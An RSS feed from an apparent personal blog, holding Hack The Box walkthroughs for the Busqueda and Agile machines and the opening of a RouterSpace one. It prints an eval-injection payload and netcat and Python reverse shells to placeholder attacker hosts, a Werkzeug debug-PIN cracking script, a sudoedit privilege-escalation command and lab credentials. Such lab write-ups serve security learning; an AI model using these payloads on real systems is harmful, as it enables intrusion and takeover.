<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Posts on Bagaz!</title><link>http://blog.bgz.app/posts/</link><description>Recent content in Posts on Bagaz!</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><lastBuildDate>Sun, 13 Aug 2023 14:14:26 +0700</lastBuildDate><atom:link href="http://blog.bgz.app/posts/index.xml" rel="self" type="application/rss+xml"/><item><title>Hackthebox Busqueda</title><link>http://blog.bgz.app/posts/hackthebox-busqueda/</link><pubDate>Sun, 13 Aug 2023 14:14:26 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-busqueda/</guid><description>Busqueda is a machine running Linux with an easy difficulty level. I will write this walkthrough briefly as I find the machine not very interesting.
Foothold First, perform a port enumeration using nmap. The scan reveals a domain on port 80.
$ nmap -sV -sC -oN busqueda.nmap 10.10.11.208 Nmap scan results for 10.10.11.208:
Host is up (0.074s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.</description><content type="html"><![CDATA[<p>Busqueda is a machine running Linux with an easy difficulty level. I will write this walkthrough briefly as I find the machine not very interesting.</p>
<h3 id="foothold">Foothold</h3>
<p>First, perform a port enumeration using nmap. The scan reveals a domain on port 80.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ nmap -sV -sC -oN busqueda.nmap 10.10.11.208
</span></span></code></pre></div><p>Nmap scan results for 10.10.11.208:</p>
<pre tabindex="0"><code>Host is up (0.074s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Add the domain <code>searcher.htb</code> to your <code>/etc/hosts</code> file. Accessing the website reveals that it uses Searchor version 2.4.0, which has a known vulnerability. You can find more details about this vulnerability at the following link:</p>
<p>Reference: <a href="https://security.snyk.io/package/pip/searchor/2.4.0">Searchor 2.4.0 vulnerabilities | Snyk</a></p>
<p>The vulnerability exists due to the use of the <code>eval</code> function, which accepts user input. To exploit this, use the following payload:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>x<span style="color:#e6db74">&#39; + __import__(&#39;</span>os<span style="color:#e6db74">&#39;).system(&#39;</span>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.10.XX.XX <span style="color:#ae81ff">4444</span> &gt;/tmp/f<span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">))</span><span style="color:#75715e">#</span>
</span></span></code></pre></div><p>Prepare a listener using netcat. This will give you a reverse shell on the machine as the <code>svc</code> user.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*UM2xak4JgiAU6Z5oYwI_iw.png" alt="shell-svc"></p>
<h3 id="root">Root</h3>
<p>There is a <code>.git</code> folder in <code>/var/www/html</code>. Download this folder to your local machine.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ git config -l | grep cody
</span></span><span style="display:flex;"><span>remote.origin.url<span style="color:#f92672">=</span>http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
</span></span></code></pre></div><p>You will find credentials for <code>cody</code> to log in to <code>gitea.searcher.htb</code>. However, nothing interesting is found on Gitea. The password can be reused for the <code>svc</code> user. Run <code>sudo -l</code> to see the commands that <code>svc</code> can execute as root.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*l7SdFM0hWXigM2qao7qaIQ.png" alt="sudo-l"></p>
<p>We cannot see the source code of <code>system-checkup.py</code>, but we can execute the script to run <code>docker ps</code> and <code>docker inspect</code>.</p>
<p>Two containers are running on the machine: <code>gitea</code> and <code>mysql_db</code>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*0XKGFyLaKHF_CO0SB6ho3Q.png" alt="docker-ps"></p>
<p>Use the following command to inspect the containers:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{{json .}}&#39;</span> &lt;container-name&gt; | grep -o <span style="color:#e6db74">&#39;{&#34;Id.*&#39;</span> | jq
</span></span></code></pre></div><p>In the inspection output for <code>mysql_db</code>, you find credentials that can be used to log in as an administrator on the <code>gitea.searcher.htb</code> subdomain.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*QuqZ36qDL6cbgJNRzSmALA.png" alt="docker-inspect"></p>
<p>On the administrator account, there is a repository named <code>scripts</code> containing the source code of <code>system-checkup.py</code>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*Q1qlm4yXYdTSz4QzCKCOqA.png" alt="administrator-scripts"></p>
<p>The source code reveals a line that executes <code>./full-checkup.sh</code>, which we can abuse by creating a <code>full-checkup.sh</code> file with a reverse shell payload in a specific folder and then executing <code>system-checkup.py</code> with the <code>full-checkup</code> argument.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*J4T6KYASpE6j16wdcqgvPQ.png" alt="vulnerable-code"></p>
<p>Prepare a listener using netcat and execute the following commands on the machine:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ cd /dev/shm
</span></span><span style="display:flex;"><span>$ echo <span style="color:#e6db74">&#39;#!/bin/bash&#39;</span> &gt; full-checkup.sh
</span></span><span style="display:flex;"><span>$ echo <span style="color:#e6db74">&#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.10.XX.XX 1337 &gt;/tmp/f&#39;</span> &gt;&gt; full-checkup.sh
</span></span><span style="display:flex;"><span>$ chmod +x full-checkup.sh
</span></span><span style="display:flex;"><span>$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
</span></span></code></pre></div><p>You will get a root shell:</p>
<p><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*HZoPlPXOJL_EWYQuKCOQNA.png" alt="shell-root">
Rooted!</p>
]]></content></item><item><title>Hackthebox Agile</title><link>http://blog.bgz.app/posts/hackthebox-agile/</link><pubDate>Sun, 06 Aug 2023 14:04:19 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-agile/</guid><description>Agile is a machine running on a Linux OS with a medium difficulty level. There was an unintended way to solve this machine, but it has since been patched, so we will cover the intended steps.
Foothold The first step in a pentest is usually scanning the machine. Here, I used nmap for port scanning.
$ nmap -sV -sC -oN agile.nmap 10.10.11.203 Nmap scan report for 10.10.11.203 Host is up (0.</description><content type="html"><![CDATA[<p>Agile is a machine running on a Linux OS with a medium difficulty level. There was an unintended way to solve this machine, but it has since been patched, so we will cover the intended steps.</p>
<h3 id="foothold">Foothold</h3>
<p>The first step in a pentest is usually scanning the machine. Here, I used nmap for port scanning.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ nmap -sV -sC -oN agile.nmap 10.10.11.203
</span></span></code></pre></div><pre tabindex="0"><code>Nmap scan report for 10.10.11.203
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f4:bc:ee:21:d7:1f:1a:a2:65:72:21:2d:5b:a6:f7:00 (ECDSA)
|_  256 65:c1:48:0d:88:cb:b9:75:a0:2c:a5:e6:37:7e:51:06 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>The website redirects to the domain <code>superpass.htb</code>, so we need to add this domain to <code>/etc/hosts</code>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*s2i8JPMLVCRHgvpFlyLLLA.png" alt="superpass"></p>
<p>The website has login and register features. After registering and logging in, we can save passwords on the website and export them as a CSV file.</p>
<p>While exporting passwords, I found an endpoint <code>/download</code> with an LFI (Local File Inclusion) vulnerability. This can be used for further enumeration. I used ZAP to simplify making requests and getting responses.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*G8-OK6iifYfxMgMFpiP4Vw.png" alt="lfi"></p>
<p>During enumeration, I concluded that the website is running in debug mode. I then attempted to bypass the Console PIN using the LFI vulnerability. Detailed steps are available in the following reference: <a href="https://www.bengrewell.com/cracking-flask-werkzeug-console-pin/">Cracking Flask Werkzeug Console PIN</a>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*65tX4nsbcg1RCm2VRezHJA.png" alt="wekrzeug"></p>
<p>Here is a modified script to generate a PIN.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> hashlib
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> itertools
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> itertools <span style="color:#f92672">import</span> chain
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">crack_md5</span>(username, modname, appname, flaskapp_path, node_uuid, machine_id):
</span></span><span style="display:flex;"><span>    h <span style="color:#f92672">=</span> hashlib<span style="color:#f92672">.</span>md5()
</span></span><span style="display:flex;"><span>    crack(h, username, modname, appname, flaskapp_path, node_uuid, machine_id)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">crack_sha1</span>(username, modname, appname, flaskapp_path, node_uuid, machine_id):
</span></span><span style="display:flex;"><span>    h <span style="color:#f92672">=</span> hashlib<span style="color:#f92672">.</span>sha1()
</span></span><span style="display:flex;"><span>    crack(h, username, modname, appname, flaskapp_path, node_uuid, machine_id)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">crack</span>(hasher, username, modname, appname, flaskapp_path, node_uuid, machine_id):
</span></span><span style="display:flex;"><span>    probably_public_bits <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>            username,
</span></span><span style="display:flex;"><span>            modname,
</span></span><span style="display:flex;"><span>            appname,
</span></span><span style="display:flex;"><span>            flaskapp_path ]
</span></span><span style="display:flex;"><span>    private_bits <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>            node_uuid,
</span></span><span style="display:flex;"><span>            machine_id ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    h <span style="color:#f92672">=</span> hasher
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> bit <span style="color:#f92672">in</span> chain(probably_public_bits, private_bits):
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> bit:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> isinstance(bit, str):
</span></span><span style="display:flex;"><span>            bit <span style="color:#f92672">=</span> bit<span style="color:#f92672">.</span>encode(<span style="color:#e6db74">&#39;utf-8&#39;</span>)
</span></span><span style="display:flex;"><span>        h<span style="color:#f92672">.</span>update(bit)
</span></span><span style="display:flex;"><span>    h<span style="color:#f92672">.</span>update(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;cookiesalt&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    cookie_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;__wzd&#39;</span> <span style="color:#f92672">+</span> h<span style="color:#f92672">.</span>hexdigest()[:<span style="color:#ae81ff">20</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    num <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> num <span style="color:#f92672">is</span> <span style="color:#66d9ef">None</span>:
</span></span><span style="display:flex;"><span>        h<span style="color:#f92672">.</span>update(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;pinsalt&#39;</span>)
</span></span><span style="display:flex;"><span>        num <span style="color:#f92672">=</span> (<span style="color:#e6db74">&#39;</span><span style="color:#e6db74">%09d</span><span style="color:#e6db74">&#39;</span> <span style="color:#f92672">%</span> int(h<span style="color:#f92672">.</span>hexdigest(), <span style="color:#ae81ff">16</span>))[:<span style="color:#ae81ff">9</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    rv <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> rv <span style="color:#f92672">is</span> <span style="color:#66d9ef">None</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> group_size <span style="color:#f92672">in</span> <span style="color:#ae81ff">5</span>, <span style="color:#ae81ff">4</span>, <span style="color:#ae81ff">3</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> len(num) <span style="color:#f92672">%</span> group_size <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span>                rv <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;-&#39;</span><span style="color:#f92672">.</span>join(num[x:x <span style="color:#f92672">+</span> group_size]<span style="color:#f92672">.</span>rjust(group_size, <span style="color:#e6db74">&#39;0&#39;</span>)
</span></span><span style="display:flex;"><span>                              <span style="color:#66d9ef">for</span> x <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>, len(num), group_size))
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>            rv <span style="color:#f92672">=</span> num
</span></span><span style="display:flex;"><span>    print(rv)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;__main__&#39;</span>:
</span></span><span style="display:flex;"><span>    usernames <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;www-data&#39;</span>]
</span></span><span style="display:flex;"><span>    modnames <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;flask.app&#39;</span>, <span style="color:#e6db74">&#39;werkzeug.debug&#39;</span>]
</span></span><span style="display:flex;"><span>    appnames <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;wsgi_app&#39;</span>, <span style="color:#e6db74">&#39;DebuggedApplication&#39;</span>, <span style="color:#e6db74">&#39;Flask&#39;</span>]
</span></span><span style="display:flex;"><span>    flaskpaths <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;/app/venv/lib/python3.10/site-packages/flask/app.py&#39;</span>]
</span></span><span style="display:flex;"><span>    nodeuuids <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;345052398398&#39;</span>]  <span style="color:#75715e"># /sys/class/net/eth0/address</span>
</span></span><span style="display:flex;"><span>    machineids <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;ed5b159560f54721827644bc9b220d00superpass.service&#39;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    combinations <span style="color:#f92672">=</span> itertools<span style="color:#f92672">.</span>product(usernames, modnames, appnames, flaskpaths, nodeuuids, machineids)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> combo <span style="color:#f92672">in</span> combinations:
</span></span><span style="display:flex;"><span>        username, modname, appname, flaskpath, nodeuuid, machineid <span style="color:#f92672">=</span> combo
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">&#39;==========================================================================&#39;</span>)
</span></span><span style="display:flex;"><span>        crack_sha1(username, modname, appname, flaskpath, nodeuuid, machineid)
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>combo<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">&#39;==========================================================================&#39;</span>)
</span></span></code></pre></div><p>Run this script to generate several PINs, and use the generated PINs to log into the console.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*lw51-L4nIHpc1JJGyYIuKw.png" alt="pin"></p>
<p>After accessing the console, execute a Python script for a reverse shell. I used revshells.com to generate the reverse shell script.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> os<span style="color:#f92672">,</span> pty<span style="color:#f92672">,</span> socket
</span></span><span style="display:flex;"><span>s <span style="color:#f92672">=</span> socket<span style="color:#f92672">.</span>socket()
</span></span><span style="display:flex;"><span>s<span style="color:#f92672">.</span>connect((<span style="color:#e6db74">&#34;LHOST&#34;</span>, LPORT))
</span></span><span style="display:flex;"><span>[os<span style="color:#f92672">.</span>dup2(s<span style="color:#f92672">.</span>fileno(), f) <span style="color:#66d9ef">for</span> f <span style="color:#f92672">in</span> (<span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">2</span>)]
</span></span><span style="display:flex;"><span>pty<span style="color:#f92672">.</span>spawn(<span style="color:#e6db74">&#34;bash&#34;</span>)
</span></span></code></pre></div><p><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*2r4Kxg1JVKxZJrLA8yfV6g.png" alt="shell-www-data"></p>
<h3 id="user">User</h3>
<p>Before getting the initial shell, I reviewed the website&rsquo;s source code and found a snippet in <code>app.py</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">---</span>SNIPPED<span style="color:#f92672">---</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">setup_db</span>():
</span></span><span style="display:flex;"><span>    db_session<span style="color:#f92672">.</span>global_init(app<span style="color:#f92672">.</span>config[<span style="color:#e6db74">&#39;SQL_URI&#39;</span>])
</span></span><span style="display:flex;"><span><span style="color:#f92672">---</span>SNIPPED<span style="color:#f92672">---</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_config</span>():
</span></span><span style="display:flex;"><span>    config_path <span style="color:#f92672">=</span> os<span style="color:#f92672">.</span>getenv(<span style="color:#e6db74">&#34;CONFIG_PATH&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">with</span> open(config_path, <span style="color:#e6db74">&#39;r&#39;</span>) <span style="color:#66d9ef">as</span> f:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> k, v <span style="color:#f92672">in</span> json<span style="color:#f92672">.</span>load(f)<span style="color:#f92672">.</span>items():
</span></span><span style="display:flex;"><span>            app<span style="color:#f92672">.</span>config[k] <span style="color:#f92672">=</span> v
</span></span><span style="display:flex;"><span><span style="color:#f92672">---</span>SNIPPED<span style="color:#f92672">---</span>
</span></span></code></pre></div><p>Checking the environment with the <code>env</code> command revealed the config file path: <code>/app/config_prod.json</code>. The content of this file includes <code>SQL_URI</code>, which contains credentials for MySQL.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;SQL_URI&#34;</span>: <span style="color:#e6db74">&#34;mysql+pymysql://superpassuser:dSA6l7q*yIVs$39Ml6ywvgK@localhost/superpass&#34;</span>}
</span></span></code></pre></div><p>Access the database using the <code>mysql</code> command and retrieve the password for user <code>corum</code> from the <code>passwords</code> table.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*QMXeoqov_CNz1cx1fjumTQ.png" alt="database"></p>
<p>Log in via SSH as <code>corum</code> with the password <code>5db7caa1d13cc37c9fc2</code>, and the <code>user.txt</code> file is in the home directory.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:786/format:webp/1*ncOwM_6BVV_saM2EIkRuFQ.png" alt="shell-corum"></p>
<h3 id="root">Root</h3>
<p>After getting a shell as <code>corum</code>, I enumerated the system and found other users like <code>edwards</code> and <code>runner</code>. I suspected I needed to access another user before reaching root. Eventually, I noticed a Chrome process running with the remote debugging option.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*rYSHcag4PBdpKPRPYDc5NA.png" alt="pspy64"></p>
<p>Perform port forwarding from port 41829 to your local machine. Then, use <code>chrome://inspect</code> for debugging. Access <code>test.superpass.htb/vault</code> to find credentials for logging in as <code>edwards</code>.</p>
<p>Reference: <a href="https://developers.google.com/cast/docs/debugging/remote_debugger">https://developers.google.com/cast/docs/debugging/remote_debugger</a></p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*8XjVz6iozx76dkKeb8ItUQ.png" alt="chrome-debugging"></p>
<p>Log in via SSH as <code>edwards</code> and check <code>sudo -l</code>. There is a command that can be executed as <code>dev_admin</code>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*3RSEOhqH34Nv8-7HGP4HJw.png" alt="shell-edward"></p>
<p>Use this command to edit the contents of another file, specifically <code>/app/venv/bin/activate</code>, since it will be executed when the root user logs in and can be edited by a user in the <code>dev_admin</code> group.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ ls -l /app/venv/bin/activate
</span></span><span style="display:flex;"><span>-rw-rw-r-- <span style="color:#ae81ff">1</span> root dev_admin <span style="color:#ae81ff">1976</span> Aug  <span style="color:#ae81ff">5</span> 18:48 /app/venv/bin/activate
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ cat /etc/bash.bashrc | tail -n2
</span></span><span style="display:flex;"><span><span style="color:#75715e"># all users will want the env associated with this application</span>
</span></span><span style="display:flex;"><span>source /app/venv/bin/activate
</span></span></code></pre></div><p>To edit the file, use the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>EDITOR<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;vim -- /app/venv/bin/activate&#39;</span> sudoedit -u dev_admin /app/config_test.json
</span></span></code></pre></div><p><a href="https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation/">https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation/</a></p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*n00Xj603q6lv-gEUor9uvg.png" alt="reverse-shell"></p>
<p>Add a reverse shell command to <code>/app/venv/bin/activate</code>, save the file, and set up a listener to receive the reverse shell from the root user.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:828/format:webp/1*tRLgqtR1ck1zzgo6l6co1g.png" alt="shell-root"></p>
<p>Rooted!</p>
]]></content></item><item><title>Hackthebox Routerspace</title><link>http://blog.bgz.app/posts/hackthebox-routerspace/</link><pubDate>Sun, 10 Jul 2022 22:18:17 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-routerspace/</guid><description>RouterSpace is a Linux machine classified as easy difficulty. This machine has retired and been replaced by RedPanda.
Machine IP: 10.10.11.148
As always, I started by scanning the services and ports using Nmap.
Nmap scan report for 10.10.11.148 Host is up (0.15s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-RouterSpace Packet Filtering V1 80/tcp open http | fingerprint-strings: | FourOhFourRequest: | HTTP/1.</description><content type="html"><![CDATA[<p>RouterSpace is a Linux machine classified as easy difficulty. This machine has retired and been replaced by RedPanda.</p>
<p><strong>Machine IP:</strong> 10.10.11.148</p>
<p>As always, I started by scanning the services and ports using Nmap.</p>
<pre tabindex="0"><code>Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-90404
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 76
|     ETag: W/&#34;4c-kb4g2Jw5REaYxk9bZLPFwpFvGsE&#34;
|     Date: Wed, 08 Jun 2022 03:27:29 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: c tO 1 9m 7u j M Xb 95 }
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-91903
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/&#34;652c-17d476c9285&#34;
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Wed, 08 Jun 2022 03:27:28 GMT
|     Connection: close
|     &lt;!doctype html&gt;
|     &lt;html class=&#34;no-js&#34; lang=&#34;zxx&#34;&gt;
|     &lt;head&gt;
|     &lt;meta charset=&#34;utf-8&#34;&gt;
|     &lt;meta http-equiv=&#34;x-ua-compatible&#34; content=&#34;ie=edge&#34;&gt;
|     &lt;title&gt;RouterSpace&lt;/title&gt;
|     &lt;meta name=&#34;description&#34; content=&#34;&#34;&gt;
|     &lt;meta name=&#34;viewport&#34; content=&#34;width=device-width, initial-scale=1&#34;&gt;
|     &lt;link rel=&#34;stylesheet&#34; href=&#34;css/bootstrap.min.css&#34;&gt;
|     &lt;link rel=&#34;stylesheet&#34; href=&#34;css/owl.carousel.min.css&#34;&gt;
|     &lt;link rel=&#34;stylesheet&#34; href=&#34;css/magnific-popup.css&#34;&gt;
|     &lt;link rel=&#34;stylesheet&#34; href=&#34;css/font-awesome.min.css&#34;&gt;
|     &lt;link rel=&#34;stylesheet&#34; href=&#34;css/themify-icons.css&#34;&gt;
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-56834
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/&#34;d-bMedpZYGrVt1nR4x+qdNZ2GqyRo&#34;
|     Date: Wed, 08 Jun 2022 03:27:28 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about
</code></pre><p>Upon accessing the website, I found a feature to download the <code>RouterSpace.apk</code> file.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*d2lpB_wDhdYZJmRieX8d8A.png" alt="routerspace"></p>
<p>I installed the application on Anbox and set up an HTTP proxy to intercept requests using Burp Suite. (Reference: <a href="https://www.rootcat.de/blog/anbox_setup_may21/">https://www.rootcat.de/blog/anbox_setup_may21/</a>)</p>
<p><strong>Note:</strong> The listener on Burp Suite must match the IP of Anbox.</p>
<pre tabindex="0"><code>$ adb install RouterSpace.apk
$ ifconfig anbox0
[REDACTED]
inet 192.168.250.1  netmask 255.255.255.0  broadcast 0.0.0.0
[REDACTED]
$ adb shell settings put global http_proxy 192.168.250.1:8080
</code></pre><p>I opened the application using <code>anbox.appmgr</code> and clicked &ldquo;Check Status,&rdquo; which intercepted a request in Burp Suite.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*ORKlBD5e_cdc3iGzZ6dY6g.png" alt="anbox"></p>
